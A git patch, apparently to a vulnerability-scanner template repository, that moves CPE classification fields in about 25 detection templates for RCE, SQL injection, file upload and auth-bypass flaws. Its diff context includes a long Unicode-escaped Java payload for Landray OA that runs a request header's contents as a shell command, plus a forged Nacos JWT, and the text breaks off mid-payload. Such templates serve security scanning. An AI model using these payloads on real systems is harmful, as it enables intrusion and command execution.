tags: zzzcms,xss
+ classification:
+ cpe: cpe:2.3:a:zzzcms:zzzcms:*:*:*:*:*:*:*:*
http:
- raw:
- |
@@ -37,4 +41,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a0047304502203da161999a9594847976e0d7b9749e60772c7ac74b5ca9ddcf84f34b5d5f220c022100e6beaed8d32aec35a9623a5be2ab607e6688f721b74e8dd896284d327f071a8a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502203da161999a9594847976e0d7b9749e60772c7ac74b5ca9ddcf84f34b5d5f220c022100e6beaed8d32aec35a9623a5be2ab607e6688f721b74e8dd896284d327f071a8a:922c64590222798bb761d5b6d8e72950
From b2e470c37e7cb2676ec159c2d1ba8871b2cc7b6c Mon Sep 17 00:00:00 2001
From: Parth Malhotra <28601533+parthmalhotra@users.noreply.github.com>
Date: Tue, 10 Sep 2024 14:11:12 +0530
Subject: [PATCH 2/3] Fix classification position
Fix classification position
---
http/cnvd/2021/CNVD-2021-33202.yaml | 5 +++--
.../credential-stuffing/self-hosted/grafana-login-check.yaml | 4 ++--
http/cves/2024/CVE-2024-4358.yaml | 4 ++--
.../webmethod/webmethod-integration-default-login.yaml | 4 ++--
http/exposed-panels/fortinet/fortisiem-panel.yaml | 4 ++--
http/exposures/configs/vbulletin-path-disclosure.yaml | 4 ++--
http/misconfiguration/graphql/graphql-alias-batching.yaml | 5 +++--
http/misconfiguration/nacos-authentication-bypass.yaml | 5 +++--
http/vulnerabilities/74cms/74cms-weixin-sqli.yaml | 5 +++--
.../landray/landray-oa-sysSearchMain-editParam-rce.yaml | 4 ++--
http/vulnerabilities/microsoft/office-webapps-ssrf.yaml | 4 ++--
http/vulnerabilities/other/flir-ax8-rce.yaml | 4 ++--
http/vulnerabilities/other/opencart-core-sqli.yaml | 4 ++--
http/vulnerabilities/ruijie/ruijie-nmc-sync-rce.yaml | 5 +++--
http/vulnerabilities/tongda/tongda-getdata-rce.yaml | 5 +++--
.../weaver/eoffice/weaver-eoffice-file-upload.yaml | 5 +++--
.../weaver/weaver-ecology-getsqldata-sqli.yaml | 5 +++--
.../weaver/weaver-ecology-hrmcareer-sqli.yaml | 5 +++--
http/vulnerabilities/weaver/weaver-jquery-file-upload.yaml | 5 +++--
.../weaver/weaver-ktreeuploadaction-file-upload.yaml | 5 +++--
.../weaver/weaver-office-server-file-upload.yaml | 5 +++--
.../weaver/weaver-uploadoperation-file-upload.yaml | 5 +++--
http/vulnerabilities/wordpress/wp-gallery-file-upload.yaml | 5 +++--
.../yonyou/yonyou-nc-grouptemplet-fileupload.yaml | 5 +++--
http/vulnerabilities/zzzcms/zzzcms-ssrf.yaml | 5 +++--
25 files changed, 66 insertions(+), 50 deletions(-)
diff --git a/http/cnvd/2021/CNVD-2021-33202.yaml b/http/cnvd/2021/CNVD-2021-33202.yaml
index 0c44b0cdd8..203f6f0428 100755
--- a/http/cnvd/2021/CNVD-2021-33202.yaml
+++ b/http/cnvd/2021/CNVD-2021-33202.yaml
@@ -9,6 +9,8 @@ info:
reference:
- https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Cology%20LoginSSO.jsp%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%20CNVD-2021-33202.md
- https://www.cnblogs.com/0day-li/p/14637680.html
+ classification:
+ cpe: cpe:2.3:a:weaver:e-cology:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
@@ -16,8 +18,7 @@ info:
product: e-cology
vendor: weaver
tags: cnvd2021,cnvd,e-cology,sqli
- classification:
- cpe: cpe:2.3:a:weaver:e-cology:*:*:*:*:*:*:*:*
+
variables:
num: "999999999"
diff --git a/http/credential-stuffing/self-hosted/grafana-login-check.yaml b/http/credential-stuffing/self-hosted/grafana-login-check.yaml
index 1a087cc186..0c45067e0f 100644
--- a/http/credential-stuffing/self-hosted/grafana-login-check.yaml
+++ b/http/credential-stuffing/self-hosted/grafana-login-check.yaml
@@ -7,6 +7,8 @@ info:
description: Checks for a valid login on self hosted Grafana instance.
reference:
- https://owasp.org/www-community/attacks/Credential_stuffing
+ classification:
+ cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:*
metadata:
max-request: 1
shodan-query: title:"Grafana"
@@ -14,8 +16,6 @@ info:
product: grafana
vendor: grafana
tags: self-hosted,creds-stuffing,login-check,grafana
- classification:
- cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:*
variables:
username: "{{username}}"
password: "{{password}}"
diff --git a/http/cves/2024/CVE-2024-4358.yaml b/http/cves/2024/CVE-2024-4358.yaml
index d04b09041b..036ebc41a0 100644
--- a/http/cves/2024/CVE-2024-4358.yaml
+++ b/http/cves/2024/CVE-2024-4358.yaml
@@ -12,6 +12,8 @@ info:
- https://summoning.team/blog/progress-report-server-rce-cve-2024-4358-cve-2024-1800/
- https://github.com/sinsinology/CVE-2024-4358
- https://docs.telerik.com/report-server/knowledge-base/registration-auth-bypass-cve-2024-4358
+ classification:
+ cpe: cpe:2.3:a:progress:telerik_report_server:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
@@ -19,8 +21,6 @@ info:
product: telerik_report_server
vendor: progress
tags: cve,cve2024,telerik,progress,auth-bypass,instrusive
- classification:
- cpe: cpe:2.3:a:progress:telerik_report_server:*:*:*:*:*:*:*:*
variables:
user: "{{rand_base(6)}}"
pass: "{{rand_base(8)}}"
diff --git a/http/default-logins/webmethod/webmethod-integration-default-login.yaml b/http/default-logins/webmethod/webmethod-integration-default-login.yaml
index 8f6de78a7b..5164d6e8c2 100644
--- a/http/default-logins/webmethod/webmethod-integration-default-login.yaml
+++ b/http/default-logins/webmethod/webmethod-integration-default-login.yaml
@@ -6,6 +6,8 @@ info:
severity: high
reference:
- https://documentation.softwareag.com/
+ classification:
+ cpe: cpe:2.3:a:softwareag:webmethods:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 5
@@ -13,8 +15,6 @@ info:
product: webmethods
vendor: softwareag
tags: default-login,webmethod
- classification:
- cpe: cpe:2.3:a:softwareag:webmethods:*:*:*:*:*:*:*:*
flow: http(1) && http(2)
http:
diff --git a/http/exposed-panels/fortinet/fortisiem-panel.yaml b/http/exposed-panels/fortinet/fortisiem-panel.yaml
index f841e44075..0871f5d19a 100644
--- a/http/exposed-panels/fortinet/fortisiem-panel.yaml
+++ b/http/exposed-panels/fortinet/fortisiem-panel.yaml
@@ -5,6 +5,8 @@ info:
author: pussycat0x
severity: info
description: FortiSIEM login panel was detected.
+ classification:
+ cpe: cpe:2.3:a:fortinet:fortisiem:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
@@ -12,8 +14,6 @@ info:
product: fortisiem
vendor: fortinet
tags: panel,fortisiem
- classification:
- cpe: cpe:2.3:a:fortinet:fortisiem:*:*:*:*:*:*:*:*
flow: http(1) && http(2)
http:
- method: GET
diff --git a/http/exposures/configs/vbulletin-path-disclosure.yaml b/http/exposures/configs/vbulletin-path-disclosure.yaml
index 33fb50d173..47e751d7b2 100644
--- a/http/exposures/configs/vbulletin-path-disclosure.yaml
+++ b/http/exposures/configs/vbulletin-path-disclosure.yaml
@@ -6,6 +6,8 @@ info:
severity: info
reference:
- https://github.com/OWASP/vbscan/blob/master/modules/pathdisclure.pl
+ classification:
+ cpe: cpe:2.3:a:vbulletin:vbulletin:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 11
@@ -13,8 +15,6 @@ info:
product: vbulletin
vendor: vbulletin
tags: config,exposure,fpd,vbulletin
- classification:
- cpe: cpe:2.3:a:vbulletin:vbulletin:*:*:*:*:*:*:*:*
flow: http(1) && http(2)
http:
diff --git a/http/misconfiguration/graphql/graphql-alias-batching.yaml b/http/misconfiguration/graphql/graphql-alias-batching.yaml
index 87515e3323..91ff139b7d 100644
--- a/http/misconfiguration/graphql/graphql-alias-batching.yaml
+++ b/http/misconfiguration/graphql/graphql-alias-batching.yaml
@@ -14,13 +14,14 @@ info:
- https://cheatsheetseries.owasp.org/cheatsheets/GraphQL_Cheat_Sheet.html
- https://graphql.security/
- https://stackoverflow.com/questions/62421352/graphql-difference-between-using-alias-versus-multiple-query-objects-when-doin
+ classification:
+ cpe: cpe:2.3:a:graphql:playground:*:*:*:*:node.js:*:*:*
metadata:
max-request: 2
product: playground
vendor: graphql
tags: graphql,misconfig
- classification:
- cpe: cpe:2.3:a:graphql:playground:*:*:*:*:node.js:*:*:*
+
variables:
str: "{{to_lower(rand_text_alpha(5))}}"
diff --git a/http/misconfiguration/nacos-authentication-bypass.yaml b/http/misconfiguration/nacos-authentication-bypass.yaml
index dc3a661836..f144d590d3 100644
--- a/http/misconfiguration/nacos-authentication-bypass.yaml
+++ b/http/misconfiguration/nacos-authentication-bypass.yaml
@@ -11,6 +11,8 @@ info:
- https://github.com/alibaba/nacos/issues/10060
- https://avd.aliyun.com/detail?id=AVD-2023-1655789
- https://nacos.io/zh-cn/docs/auth.html
+ classification:
+ cpe: cpe:2.3:a:alibaba:nacos:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
@@ -18,8 +20,7 @@ info:
product: nacos
vendor: alibaba
tags: auth-bypass,nacos,misconfig,jwt
- classification:
- cpe: cpe:2.3:a:alibaba:nacos:*:*:*:*:*:*:*:*
+
variables:
token: eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6OTk5OTk5OTk5OTl9.-isk56R8NfioHVYmpj4oz92nUteNBCN3HRd0-Hfk76g
diff --git a/http/vulnerabilities/74cms/74cms-weixin-sqli.yaml b/http/vulnerabilities/74cms/74cms-weixin-sqli.yaml
index b4b482414e..a5823b9e7e 100644
--- a/http/vulnerabilities/74cms/74cms-weixin-sqli.yaml
+++ b/http/vulnerabilities/74cms/74cms-weixin-sqli.yaml
@@ -8,6 +8,8 @@ info:
There is a libxml_disable_entity_loader function to prevent XML eXternal Entity Injection, but this function needs to be customized by the user. If the user does not customize it, there will be no filtering, which leads to SQL injection vulnerabilities.
reference:
- https://cn-sec.com/archives/25900.html
+ classification:
+ cpe: cpe:2.3:a:74cms:74cms:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
@@ -15,8 +17,7 @@ info:
product: 74cms
vendor: 74cms
tags: 74cms,weixin,sqli
- classification:
- cpe: cpe:2.3:a:74cms:74cms:*:*:*:*:*:*:*:*
+
variables:
num: '999999999'
diff --git a/http/vulnerabilities/landray/landray-oa-sysSearchMain-editParam-rce.yaml b/http/vulnerabilities/landray/landray-oa-sysSearchMain-editParam-rce.yaml
index 5cd1adefe4..8317ae79d5 100755
--- a/http/vulnerabilities/landray/landray-oa-sysSearchMain-editParam-rce.yaml
+++ b/http/vulnerabilities/landray/landray-oa-sysSearchMain-editParam-rce.yaml
@@ -8,6 +8,8 @@ info:
reference:
- https://www.modb.pro/db/555240
- https://github.com/mhaskar/XMLDecoder-payload-generator
+ classification:
+ cpe: cpe:2.3:a:landray:landray_office_automation:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
@@ -15,8 +17,6 @@ info:
product: landray_office_automation
vendor: landray
tags: landray,rce
- classification:
- cpe: cpe:2.3:a:landray:landray_office_automation:*:*:*:*:*:*:*:*
variables:
payload: '{"body":{"file":"/sys/search/sys_search_main/sysSearchMain.do?method=editParam"}}&fdParemNames=11&fdParameters=\u0020\u0020\u0020\u0020\u0062\u006f\u006f\u006c\u0065\u0061\u006e\u0020\u0066\u006c\u0061\u0067\u0020\u003d\u0020\u0066\u0061\u006c\u0073\u0065\u003b\u0054\u0068\u0072\u0065\u0061\u0064\u0047\u0072\u006f\u0075\u0070\u0020\u0067\u0072\u006f\u0075\u0070\u0020\u003d\u0020\u0054\u0068\u0072\u0065\u0061\u0064\u002e\u0063\u0075\u0072\u0072\u0065\u006e\u0074\u0054\u0068\u0072\u0065\u0061\u0064\u0028\u0029\u002e\u0067\u0065\u0074\u0054\u0068\u0072\u0065\u0061\u0064\u0047\u0072\u006f\u0075\u0070\u0028\u0029\u003b\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u002e\u0046\u0069\u0065\u006c\u0064\u0020\u0066\u0020\u003d\u0020\u0067\u0072\u006f\u0075\u0070\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0074\u0068\u0072\u0065\u0061\u0064\u0073\u0022\u0029\u003b\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u0054\u0068\u0072\u0065\u0061\u0064\u005b\u005d\u0020\u0074\u0068\u0072\u0065\u0061\u0064\u0073\u0020\u003d\u0020\u0028\u0054\u0068\u0072\u0065\u0061\u0064\u005b\u005d\u0029\u0020\u0066\u002e\u0067\u0065\u0074\u0028\u0067\u0072\u006f\u0075\u0070\u0029\u003b\u0066\u006f\u0072\u0020\u0028\u0069\u006e\u0074\u0020\u0069\u0020\u003d\u0020\u0030\u003b\u0020\u0069\u0020\u003c\u0020\u0074\u0068\u0072\u0065\u0061\u0064\u0073\u002e\u006c\u0065\u006e\u0067\u0074\u0068\u003b\u0020\u0069\u002b\u002b\u0029\u0020\u007b\u0020\u0074\u0072\u0079\u0020\u007b\u0020\u0054\u0068\u0072\u0065\u0061\u0064\u0020\u0074\u0020\u003d\u0020\u0074\u0068\u0072\u0065\u0061\u0064\u0073\u005b\u0069\u005d\u003b\u0069\u0066\u0020\u0028\u0074\u0020\u003d\u003d\u0020\u006e\u0075\u006c\u006c\u0029\u0020\u007b\u0020\u0063\u006f\u006e\u0074\u0069\u006e\u0075\u0065\u003b\u0020\u007d\u0053\u0074\u0072\u0069\u006e\u0067\u0020\u0073\u0074\u0072\u0020\u003d\u0020\u0074\u002e\u0067\u0065\u0074\u004e\u0061\u006d\u0065\u0028\u0029\u003b\u0069\u0066\u0020\u0028\u0073\u0074\u0072\u002e\u0063\u006f\u006e\u0074\u0061\u0069\u006e\u0073\u0028\u0022\u0065\u0078\u0065\u0063\u0022\u0029\u0020\u007c\u007c\u0020\u0021\u0073\u0074\u0072\u002e\u0063\u006f\u006e\u0074\u0061\u0069\u006e\u0073\u0028\u0022\u0068\u0074\u0074\u0070\u0022\u0029\u0029\u0020\u007b\u0020\u0063\u006f\u006e\u0074\u0069\u006e\u0075\u0065\u003b\u0020\u007d\u0066\u0020\u003d\u0020\u0074\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0074\u0061\u0072\u0067\u0065\u0074\u0022\u0029\u003b\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u004f\u0062\u006a\u0065\u0063\u0074\u0020\u006f\u0062\u006a\u0020\u003d\u0020\u0066\u002e\u0067\u0065\u0074\u0028\u0074\u0029\u003b\u0069\u0066\u0020\u0028\u0021\u0028\u006f\u0062\u006a\u0020\u0069\u006e\u0073\u0074\u0061\u006e\u0063\u0065\u006f\u0066\u0020\u0052\u0075\u006e\u006e\u0061\u0062\u006c\u0065\u0029\u0029\u0020\u007b\u0020\u0063\u006f\u006e\u0074\u0069\u006e\u0075\u0065\u003b\u0020\u007d\u0066\u0020\u003d\u0020\u006f\u0062\u006a\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0074\u0068\u0069\u0073\u0024\u0030\u0022\u0029\u003b\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u006f\u0062\u006a\u0020\u003d\u0020\u0066\u002e\u0067\u0065\u0074\u0028\u006f\u0062\u006a\u0029\u003b\u0074\u0072\u0079\u0020\u007b\u0020\u0066\u0020\u003d\u0020\u006f\u0062\u006a\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0068\u0061\u006e\u0064\u006c\u0065\u0072\u0022\u0029\u003b\u0020\u007d\u0020\u0063\u0061\u0074\u0063\u0068\u0020\u0028\u004e\u006f\u0053\u0075\u0063\u0068\u0046\u0069\u0065\u006c\u0064\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0020\u0065\u0029\u0020\u007b\u0020\u0066\u0020\u003d\u0020\u006f\u0062\u006a\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0053\u0075\u0070\u0065\u0072\u0063\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0053\u0075\u0070\u0065\u0072\u0063\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0068\u0061\u006e\u0064\u006c\u0065\u0072\u0022\u0029\u003b\u0020\u007d\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u006f\u0062\u006a\u0020\u003d\u0020\u0066\u002e\u0067\u0065\u0074\u0028\u006f\u0062\u006a\u0029\u003b\u0074\u0072\u0079\u0020\u007b\u0020\u0066\u0020\u003d\u0020\u006f\u0062\u006a\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0053\u0075\u0070\u0065\u0072\u0063\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0067\u006c\u006f\u0062\u0061\u006c\u0022\u0029\u003b\u0020\u007d\u0020\u0063\u0061\u0074\u0063\u0068\u0020\u0028\u004e\u006f\u0053\u0075\u0063\u0068\u0046\u0069\u0065\u006c\u0064\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0020\u0065\u0029\u0020\u007b\u0020\u0066\u0020\u003d\u0020\u006f\u0062\u006a\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0067\u006c\u006f\u0062\u0061\u006c\u0022\u0029\u003b\u0020\u007d\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u006f\u0062\u006a\u0020\u003d\u0020\u0066\u002e\u0067\u0065\u0074\u0028\u006f\u0062\u006a\u0029\u003b\u0066\u0020\u003d\u0020\u006f\u0062\u006a\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u0073\u0022\u0029\u003b\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u006a\u0061\u0076\u0061\u002e\u0075\u0074\u0069\u006c\u002e\u004c\u0069\u0073\u0074\u0020\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u0073\u0020\u003d\u0020\u0028\u006a\u0061\u0076\u0061\u002e\u0075\u0074\u0069\u006c\u002e\u004c\u0069\u0073\u0074\u0029\u0020\u0028\u0066\u002e\u0067\u0065\u0074\u0028\u006f\u0062\u006a\u0029\u0029\u003b\u0066\u006f\u0072\u0020\u0028\u0069\u006e\u0074\u0020\u006a\u0020\u003d\u0020\u0030\u003b\u0020\u006a\u0020\u003c\u0020\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u0073\u002e\u0073\u0069\u007a\u0065\u0028\u0029\u003b\u0020\u002b\u002b\u006a\u0029\u0020\u007b\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u0020\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u0020\u003d\u0020\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u0073\u002e\u0067\u0065\u0074\u0028\u006a\u0029\u003b\u0066\u0020\u003d\u0020\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0072\u0065\u0071\u0022\u0029\u003b\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u004f\u0062\u006a\u0065\u0063\u0074\u0020\u0072\u0065\u0071\u0020\u003d\u0020\u0066\u002e\u0067\u0065\u0074\u0028\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u0029\u003b\u004f\u0062\u006a\u0065\u0063\u0074\u0020\u0072\u0065\u0073\u0070\u0020\u003d\u0020\u0072\u0065\u0071\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0067\u0065\u0074\u0052\u0065\u0073\u0070\u006f\u006e\u0073\u0065\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u0030\u005d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0072\u0065\u0071\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u0030\u005d\u0029\u003b\u0073\u0074\u0072\u0020\u003d\u0020\u0028\u0053\u0074\u0072\u0069\u006e\u0067\u0029\u0020\u0072\u0065\u0071\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0067\u0065\u0074\u0048\u0065\u0061\u0064\u0065\u0072\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u005d\u007b\u0053\u0074\u0072\u0069\u006e\u0067\u002e\u0063\u006c\u0061\u0073\u0073\u007d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0072\u0065\u0071\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u005d\u007b\u0022\u0054\u0065\u0073\u0074\u0022\u007d\u0029\u003b\u0069\u0066\u0020\u0028\u0073\u0074\u0072\u0020\u0021\u003d\u0020\u006e\u0075\u006c\u006c\u0020\u0026\u0026\u0020\u0021\u0073\u0074\u0072\u002e\u0069\u0073\u0045\u006d\u0070\u0074\u0079\u0028\u0029\u0029\u0020\u007b\u0020\u0072\u0065\u0073\u0070\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0073\u0065\u0074\u0053\u0074\u0061\u0074\u0075\u0073\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u005d\u007b\u0069\u006e\u0074\u002e\u0063\u006c\u0061\u0073\u0073\u007d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0072\u0065\u0073\u0070\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u005d\u007b\u006e\u0065\u0077\u0020\u0049\u006e\u0074\u0065\u0067\u0065\u0072\u0028\u0032\u0030\u0030\u0029\u007d\u0029\u003b\u0053\u0074\u0072\u0069\u006e\u0067\u005b\u005d\u0020\u0063\u006d\u0064\u0073\u0020\u003d\u0020\u0053\u0079\u0073\u0074\u0065\u006d\u002e\u0067\u0065\u0074\u0050\u0072\u006f\u0070\u0065\u0072\u0074\u0079\u0028\u0022\u006f\u0073\u002e\u006e\u0061\u006d\u0065\u0022\u0029\u002e\u0074\u006f\u004c\u006f\u0077\u0065\u0072\u0043\u0061\u0073\u0065\u0028\u0029\u002e\u0063\u006f\u006e\u0074\u0061\u0069\u006e\u0073\u0028\u0022\u0077\u0069\u006e\u0064\u006f\u0077\u0022\u0029\u0020\u003f\u0020\u006e\u0065\u0077\u0020\u0053\u0074\u0072\u0069\u006e\u0067\u005b\u005d\u007b\u0022\u0063\u006d\u0064\u002e\u0065\u0078\u0065\u0022\u002c\u0020\u0022\u002f\u0063\u0022\u002c\u0020\u0073\u0074\u0072\u007d\u0020\u003a\u0020\u006e\u0065\u0077\u0020\u0053\u0074\u0072\u0069\u006e\u0067\u005b\u005d\u007b\u0022\u002f\u0062\u0069\u006e\u002f\u0073\u0068\u0022\u002c\u0020\u0022\u002d\u0063\u0022\u002c\u0020\u0073\u0074\u0072\u007d\u003b\u0053\u0074\u0072\u0069\u006e\u0067\u0020\u0063\u0068\u0061\u0072\u0073\u0065\u0074\u004e\u0061\u006d\u0065\u0020\u003d\u0020\u0053\u0079\u0073\u0074\u0065\u006d\u002e\u0067\u0065\u0074\u0050\u0072\u006f\u0070\u0065\u0072\u0074\u0079\u0028\u0022\u006f\u0073\u002e\u006e\u0061\u006d\u0065\u0022\u0029\u002e\u0074\u006f\u004c\u006f\u0077\u0065\u0072\u0043\u0061\u0073\u0065\u0028\u0029\u002e\u0063\u006f\u006e\u0074\u0061\u0069\u006e\u0073\u0028\u0022\u0077\u0069\u006e\u0064\u006f\u0077\u0022\u0029\u0020\u003f\u0020\u0022\u0047\u0042\u004b\u0022\u003a\u0022\u0055\u0054\u0046\u002d\u0038\u0022\u003b\u0062\u0079\u0074\u0065\u005b\u005d\u0020\u0074\u0065\u0078\u0074\u0032\u0020\u003d\u0028\u006e\u0065\u0077\u0020\u006a\u0061\u0076\u0061\u002e\u0075\u0074\u0069\u006c\u002e\u0053\u0063\u0061\u006e\u006e\u0065\u0072\u0028\u0028\u006e\u0065\u0077\u0020\u0050\u0072\u006f\u0063\u0065\u0073\u0073\u0042\u0075\u0069\u006c\u0064\u0065\u0072\u0028\u0063\u006d\u0064\u0073\u0029\u0029\u002e\u0073\u0074\u0061\u0072\u0074\u0028\u0029\u002e\u0067\u0065\u0074\u0049\u006e\u0070\u0075\u0074\u0053\u0074\u0072\u0065\u0061\u006d\u0028\u0029\u002c\u0063\u0068\u0061\u0072\u0073\u0065\u0074\u004e\u0061\u006d\u0065\u0029\u0029\u002e\u0075\u0073\u0065\u0044\u0065\u006c\u0069\u006d\u0069\u0074\u0065\u0072\u0028\u0022\u005c\u005c\u0041\u0022\u0029\u002e\u006e\u0065\u0078\u0074\u0028\u0029\u002e\u0067\u0065\u0074\u0042\u0079\u0074\u0065\u0073\u0028\u0063\u0068\u0061\u0072\u0073\u0065\u0074\u004e\u0061\u006d\u0065\u0029\u003b\u0062\u0079\u0074\u0065\u005b\u005d\u0020\u0072\u0065\u0073\u0075\u006c\u0074\u003d\u0028\u0022\u0045\u0078\u0065\u0063\u0075\u0074\u0065\u003a\u0020\u0020\u0020\u0020\u0022\u002b\u006e\u0065\u0077\u0020\u0053\u0074\u0072\u0069\u006e\u0067\u0028\u0074\u0065\u0078\u0074\u0032\u002c\u0022\u0075\u0074\u0066\u002d\u0038\u0022\u0029\u0029\u002e\u0067\u0065\u0074\u0042\u0079\u0074\u0065\u0073\u0028\u0063\u0068\u0061\u0072\u0073\u0065\u0074\u004e\u0061\u006d\u0065\u0029\u003b\u0074\u0072\u0079\u0020\u007b\u0020\u0043\u006c\u0061\u0073\u0073\u0020\u0063\u006c\u0073\u0020\u003d\u0020\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u0022\u006f\u0072\u0067\u002e\u0061\u0070\u0061\u0063\u0068\u0065\u002e\u0074\u006f\u006d\u0063\u0061\u0074\u002e\u0075\u0074\u0069\u006c\u002e\u0062\u0075\u0066\u002e\u0042\u0079\u0074\u0065\u0043\u0068\u0075\u006e\u006b\u0022\u0029\u003b\u006f\u0062\u006a\u0020\u003d\u0020\u0063\u006c\u0073\u002e\u006e\u0065\u0077\u0049\u006e\u0073\u0074\u0061\u006e\u0063\u0065\u0028\u0029\u003b\u0063\u006c\u0073\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0073\u0065